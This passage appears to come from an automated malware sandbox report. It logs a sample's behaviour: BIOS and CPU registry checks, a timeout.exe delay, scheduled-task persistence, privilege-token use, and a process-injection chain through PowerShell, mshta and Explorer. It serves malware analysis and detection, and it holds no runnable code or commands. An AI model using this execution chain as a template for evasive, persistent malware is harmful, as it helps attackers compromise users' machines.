Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{ADD3E05B-390C-43B1-9059-D68C9BA7D6FA} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-22591836-1183090055-1220658180-1000\{3B208D04-42E4-4A9E-9D5D-4621314044E3} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\dxukjxx\gmgc.exe N/A
N/A N/A C:\ProgramData\dxukjxx\gmgc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 116 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 116 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 116 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4896 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 4896 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1728 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 4896 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 4896 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1836 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1836 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1836 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4896 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 4896 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 3108 wrote to memory of 3544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3108 wrote to memory of 3544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3544 wrote to memory of 4688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3544 wrote to memory of 4688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4688 wrote to memory of 1596 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4688 wrote to memory of 1596 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4896 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
PID 4896 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
PID 4896 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
PID 3544 wrote to memory of 3384 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4292 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\cmd.exe
PID 4292 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\cmd.exe
PID 4292 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\cmd.exe
PID 4292 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\mshta.exe
PID 4292 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\mshta.exe
PID 4292 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe C:\Windows\SysWOW64\mshta.exe
PID 2704 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3856 wrote to memory of 1844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4896 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4896 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
